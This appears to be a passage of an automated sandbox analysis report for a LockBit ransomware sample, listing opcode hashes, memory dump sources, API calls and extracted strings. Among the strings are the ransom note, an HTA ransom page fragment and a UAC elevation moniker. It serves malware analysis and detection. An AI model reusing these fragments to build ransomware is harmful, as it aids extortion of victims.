                                                                                                            • Opcode ID: a38a40fa1bc321eeb51ca28a3e1bc2423efa8e9ebbf1a605e8ec69a7250159e6
                                                                                                            • Instruction ID: 02cd908954539161bc6f5028b2939703fa4e984395d6ca8e2fc53d9dc02c7415
                                                                                                            • Opcode Fuzzy Hash: a38a40fa1bc321eeb51ca28a3e1bc2423efa8e9ebbf1a605e8ec69a7250159e6
                                                                                                            • Instruction Fuzzy Hash: 9F219074D0424DABEB00DFE4DD09BEEBBB8EF19304F004269E950B61E1E7B456498B94
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Auth$Genu$cAMD$enti$ineI$ntel
                                                                                                            • API String ID: 0-1714976780
                                                                                                            • Opcode ID: 1c80890751de60defcadc79905cac37453c4ad4b5cf16b17387822ba7a85bceb
                                                                                                            • Instruction ID: fc43bcbccbb9512428677ec3177152ccef997f7d8f4a13314f8dae16fef0d032
                                                                                                            • Opcode Fuzzy Hash: 1c80890751de60defcadc79905cac37453c4ad4b5cf16b17387822ba7a85bceb
                                                                                                            • Instruction Fuzzy Hash: 15218E7190421A9FDB24CF59DA416EBF7B5FF44321F9086ABD419DA200D3B5AEE0CB84
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • free.MSVCRT(00000000,00000000,00000000,00408710,00000000,000007D8), ref: 0040CBD7
                                                                                                            • free.MSVCRT(00000000,00000000,00000000,00408710,00000000,000007D8), ref: 0040CBF6
                                                                                                            • free.MSVCRT(00000000,00000000,00000000,00408710,00000000,000007D8), ref: 0040CC15
                                                                                                            • free.MSVCRT(00000000,00000000,00000000,00408710,00000000,000007D8), ref: 0040CC2F
                                                                                                            • free.MSVCRT(00000000,00000000,?,00408710,00000000,000007D8), ref: 0040CC49
                                                                                                              • Part of subcall function 0040BF10: free.MSVCRT(00000000,00000000,00000000,-00000002), ref: 0040C0B1
                                                                                                              • Part of subcall function 0040BF10: free.MSVCRT(00000000,00000000,00000000,-00000002), ref: 0040C0CE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: free
                                                                                                            • String ID:
                                                                                                            • API String ID: 1294909896-0
                                                                                                            • Opcode ID: 23bcb86d1b2e731cbf514daa42f04211225205fe56656a129939abefd70622c8
                                                                                                            • Instruction ID: 30ee0b842993cbac871ec0d33fe0992d288e7416a8e6868d06d9f47e057d32ee
                                                                                                            • Opcode Fuzzy Hash: 23bcb86d1b2e731cbf514daa42f04211225205fe56656a129939abefd70622c8
                                                                                                            • Instruction Fuzzy Hash: 48D13DB2D00219DBDF20DF95D881BEFB7B8AF44314F14423AE815F7281E779AA458B94
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 00412521
                                                                                                            • NtSetInformationThread.NTDLL ref: 00412535
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Thread$CreateInformation
                                                                                                            • String ID:
                                                                                                            • API String ID: 425492364-0
                                                                                                            • Opcode ID: cb1234e49a22695a67223fce6e034ed40402628f87ee03120d716390b5bccc62
                                                                                                            • Instruction ID: b6915d1e1a4001ca82749a224d7b58985b9e98a57660c80c7ad88d6121920b5c
                                                                                                            • Opcode Fuzzy Hash: cb1234e49a22695a67223fce6e034ed40402628f87ee03120d716390b5bccc62
                                                                                                            • Instruction Fuzzy Hash: 7DE0EC717813287AE1245658AD4AFEA725CC745B71F1003A5BE55AA2D0E6D02D5042E9
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Strings
                                                                                                            • Software\Microsoft\Windows NT\CurrentVersion\ICM\Calibration, xrefs: 004073EB
                                                                                                            • DisplayCalibrator, xrefs: 004072DD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: DisplayCalibrator$Software\Microsoft\Windows NT\CurrentVersion\ICM\Calibration
                                                                                                            • API String ID: 0-2147558853
                                                                                                            • Opcode ID: 2fa1fb21652bbd0b4227bcafd468e96a4892961622d1b564e0c162b62ee6dcaf
                                                                                                            • Instruction ID: 683233c3ab6c984c1a45b8e2d31eca5e49399d524982fce585b0c6c14be73918
                                                                                                            • Opcode Fuzzy Hash: 2fa1fb21652bbd0b4227bcafd468e96a4892961622d1b564e0c162b62ee6dcaf
                                                                                                            • Instruction Fuzzy Hash: 6271B8A4221A449AC3109F61D4857623BF1FF1EB09BA154BEE049CF263E3BBD587C719
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Strings
                                                                                                            • open, xrefs: 00401990
                                                                                                            • All your files are encrypted by LockBitFor more information see Restore-My-Files.txt that is located in every encrypted folder, xrefs: 004019DB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: All your files are encrypted by LockBitFor more information see Restore-My-Files.txt that is located in every encrypted folder$open
                                                                                                            • API String ID: 0-2221671223
                                                                                                            • Opcode ID: b2be0f1804b734c45b09f51672809fa8b059108303674d796cf927a2cfb4c354
                                                                                                            • Instruction ID: 8c684036f50190a46925feaae0460d1f315b08fec2826dabd766b9ead19098c0
                                                                                                            • Opcode Fuzzy Hash: b2be0f1804b734c45b09f51672809fa8b059108303674d796cf927a2cfb4c354
                                                                                                            • Instruction Fuzzy Hash: CC319764220284EAD361DF75DA44662B7E1BF3D3483A6659EA004CF232E3B7D443C76E
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Strings
                                                                                                            • {D2E7041B-2927-42fb-8E9F-7CE93B6DC937}, xrefs: 00407748
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: {D2E7041B-2927-42fb-8E9F-7CE93B6DC937}
                                                                                                            • API String ID: 0-2101570164
                                                                                                            • Opcode ID: 1f6b1a4e53bdfa8dd1da18536bea02941a461f1cbe50070e93c1701f3a41488d
                                                                                                            • Instruction ID: cb121eae135309047a344f8aa3c57911145dd83c0a461438232c4b060f0b0b53
                                                                                                            • Opcode Fuzzy Hash: 1f6b1a4e53bdfa8dd1da18536bea02941a461f1cbe50070e93c1701f3a41488d
                                                                                                            • Instruction Fuzzy Hash: 8BC1A668210245D9C3209F61D4487A237B0FF1DB0AFA554BEE8888F662F77B8987D71D
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Strings
                                                                                                            • <html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta http-equiv="x-ua-compatible" content="ie=9"><title>LockBit</title><hta:application id=LockBit applicationName=LockBit icon=explorer.exe selection=no scroll=no contextmenu=no i, xrefs: 0040170D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: <html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta http-equiv="x-ua-compatible" content="ie=9"><title>LockBit</title><hta:application id=LockBit applicationName=LockBit icon=explorer.exe selection=no scroll=no contextmenu=no i
                                                                                                            • API String ID: 0-1162492700
                                                                                                            • Opcode ID: c7db0b69c3bb922ae16e2976b37e0c0d107bad6c5e1b1edcef2b1e1f2b7bfe67
                                                                                                            • Instruction ID: e0bbed4da667d8c06a28ae5de1d4ad58791204383d96fb6d6d63454645ad3411
                                                                                                            • Opcode Fuzzy Hash: c7db0b69c3bb922ae16e2976b37e0c0d107bad6c5e1b1edcef2b1e1f2b7bfe67
                                                                                                            • Instruction Fuzzy Hash: 997193A85242919AC304DF61E5846A237E0FF1C358B62906AD409CF262F37FE847D71E
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: L/
                                                                                                            • API String ID: 0-126738381
                                                                                                            • Opcode ID: 9c9a5ceda5506c8c40487b47052defc89d76d9952ae3d9f4c8dd7a3785cfe52f
                                                                                                            • Instruction ID: e9bd2f92f6069a470cafdfa8bb56ff18bf997d6f7a370cd17972802bb167a9e9
                                                                                                            • Opcode Fuzzy Hash: 9c9a5ceda5506c8c40487b47052defc89d76d9952ae3d9f4c8dd7a3785cfe52f
                                                                                                            • Instruction Fuzzy Hash: B471D4646242889AC320CF65955476673F0FF1C70ABA154BEE088CF622E7FBC547D789
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Strings
                                                                                                            • {3E5FC7F9-9A51-4367-9063-A120244FBEC7}, xrefs: 004070BA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                            • API String ID: 0-2967596106
                                                                                                            • Opcode ID: fc0dd5e5583ef6a20b797ebbf075fd2174e9ed43b46def2727ee2e0c3999e6b0
                                                                                                            • Instruction ID: ce4c9a57974ba48fc5d073982658e14d044e7a9e07d22f0ef0d8284a5e93c10d
                                                                                                            • Opcode Fuzzy Hash: fc0dd5e5583ef6a20b797ebbf075fd2174e9ed43b46def2727ee2e0c3999e6b0
                                                                                                            • Instruction Fuzzy Hash: A751AFB42252449AC320AF65E49466277F1FF1E3493A164AEE104CF262E3BBC5C7DB1D
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Strings
                                                                                                            • Software\Microsoft\Windows NT\CurrentVersion\ICM\Calibration, xrefs: 00407573
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Software\Microsoft\Windows NT\CurrentVersion\ICM\Calibration
                                                                                                            • API String ID: 0-1132952370
                                                                                                            • Opcode ID: 139ce74cf0d9e6033a2ea976a1deca15d9cc7eebaa9612a7039c5ae6124d23d1
                                                                                                            • Instruction ID: f4912ba350f3842ce76d3347925c860a1e0e668d921462ab8ad4991e7b902a04
                                                                                                            • Opcode Fuzzy Hash: 139ce74cf0d9e6033a2ea976a1deca15d9cc7eebaa9612a7039c5ae6124d23d1
                                                                                                            • Instruction Fuzzy Hash: 4F3197A8321251DEC3209F65D88166277F1BF2E7093E1556EA048CF221E3BBC587CB5D
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: explorer.exe
                                                                                                            • API String ID: 0-3187896405
                                                                                                            • Opcode ID: d1b9fc59bbecc5993e257a98ed3ac2cf2c1239561509ae913179215cf32f06a6
                                                                                                            • Instruction ID: 7ddeba2b5bdd03033d55fa764e3fc4911680381df27ecca6040abab7c9a44144
                                                                                                            • Opcode Fuzzy Hash: d1b9fc59bbecc5993e257a98ed3ac2cf2c1239561509ae913179215cf32f06a6
                                                                                                            • Instruction Fuzzy Hash: 6A21D8A83212409AD310CF75D840612B7F5FF6E3097A6645EE048CF221E3BACA83CB5D
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: \explorer.exe
                                                                                                            • API String ID: 0-1502772786
                                                                                                            • Opcode ID: db212fcfbb4f4b31ab44e9a56cc1ab060d9173a10415b55d6360e074fc6fd26d
                                                                                                            • Instruction ID: 1709af8aeb5ba47dbb4077e2a4a82dc99c49f27be7f76db7c2844bca057da2f8
                                                                                                            • Opcode Fuzzy Hash: db212fcfbb4f4b31ab44e9a56cc1ab060d9173a10415b55d6360e074fc6fd26d
                                                                                                            • Instruction Fuzzy Hash: F821C6A43212849AD310DF76D840662BBF1EF6D3093A6555FA008CF272E3BAD583CB5D
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Strings
                                                                                                            • Elevation:Administrator!new:, xrefs: 00406F91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Elevation:Administrator!new:
                                                                                                            • API String ID: 0-3972829072
                                                                                                            • Opcode ID: 84b26f847eb0d02ea99f88c76090f17a6b9bd27102d1247779df3d7be9ecc040
                                                                                                            • Instruction ID: 704186bce172e53745d1acdfb9b8374d14b4cf9daca555645bbda02f615229e2
                                                                                                            • Opcode Fuzzy Hash: 84b26f847eb0d02ea99f88c76090f17a6b9bd27102d1247779df3d7be9ecc040
                                                                                                            • Instruction Fuzzy Hash: 3121C7A82262809AC314CF61E94065277F0FF1EB097A1556EE008CF231F3BAC687C75D
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 33a5cb342cfaa995733c20134d3d2b1f62f558cc5adb18ade1f532f32eeae30e
                                                                                                            • Instruction ID: b261ac3a50362f32901959e004372cb6c4fdcb791b9ab0057a198d9f2b5e0701
                                                                                                            • Opcode Fuzzy Hash: 33a5cb342cfaa995733c20134d3d2b1f62f558cc5adb18ade1f532f32eeae30e
                                                                                                            • Instruction Fuzzy Hash: 40620C72F002188BCF5CCF9DD8955EEB7F2BF88214B198169E81AF7345CA35AD518A84
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4ea7d1285789e9cb66812a03fa3d43e5d05164592a37be4625b587fc9c154954
                                                                                                            • Instruction ID: cf51cefd209fafef82defc031b40664737e75759367ed239cbf54413ca06360a
                                                                                                            • Opcode Fuzzy Hash: 4ea7d1285789e9cb66812a03fa3d43e5d05164592a37be4625b587fc9c154954
                                                                                                            • Instruction Fuzzy Hash: DD82B05018E3D09CD7168AB650557E23FA11B3B64DF3D60EED0E85E2A3C117838BEB66
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c8ea105977684aa41ff41622133b533c093e97bde337a89de3da4be27ba73a0b
                                                                                                            • Instruction ID: bdce84f6824e243b1e8034c4363889ab71f78fe7a0c79b2835b7561a6f49231b
                                                                                                            • Opcode Fuzzy Hash: c8ea105977684aa41ff41622133b533c093e97bde337a89de3da4be27ba73a0b
                                                                                                            • Instruction Fuzzy Hash: C802B3705541A49BD70CCF6ADCF04B9BBB2EB89341359C2AEE5471B392C2386612DFA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: fb0d5d40923a335ee4137c9fe9d8eaf183570094953695664c3cccca83598e39
                                                                                                            • Instruction ID: 2bde9e0d94ee324bbe081eb832c0b3f2c8c8e34d403bdaf4cd8edb931aa2a332
                                                                                                            • Opcode Fuzzy Hash: fb0d5d40923a335ee4137c9fe9d8eaf183570094953695664c3cccca83598e39
                                                                                                            • Instruction Fuzzy Hash: 0202B2309101A88FD70CCF5AD8F04BDBBB2EB89341749C25EE5965B392C2386616DFE4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f7011e720c71f73d4957048792c0a84e6a0d6a7c98d35dfc784394e6078459c2
                                                                                                            • Instruction ID: 9deaacb0afc91c0e11322634d4a94a491bc0f983142559536a5b76fc2628982f
                                                                                                            • Opcode Fuzzy Hash: f7011e720c71f73d4957048792c0a84e6a0d6a7c98d35dfc784394e6078459c2
                                                                                                            • Instruction Fuzzy Hash: 0FF171716042B84FE318CF3E4854576BFE1BF8D10174A82EBE8E9DB292D638C515DBA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2e05fa869a30455fd5193a80cd48b8e9768e245e1a557d2195dcc195c5c72f8d
                                                                                                            • Instruction ID: c2e92d0d5d127f3c11b98c0932e2b0ff80b78a969e44fda294b161e3b9604cc4
                                                                                                            • Opcode Fuzzy Hash: 2e05fa869a30455fd5193a80cd48b8e9768e245e1a557d2195dcc195c5c72f8d
                                                                                                            • Instruction Fuzzy Hash: 49224E68150255E9D320AF61D5183B237B0FF1EB09B6550BEE8488E262F3BB49C7D72D
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
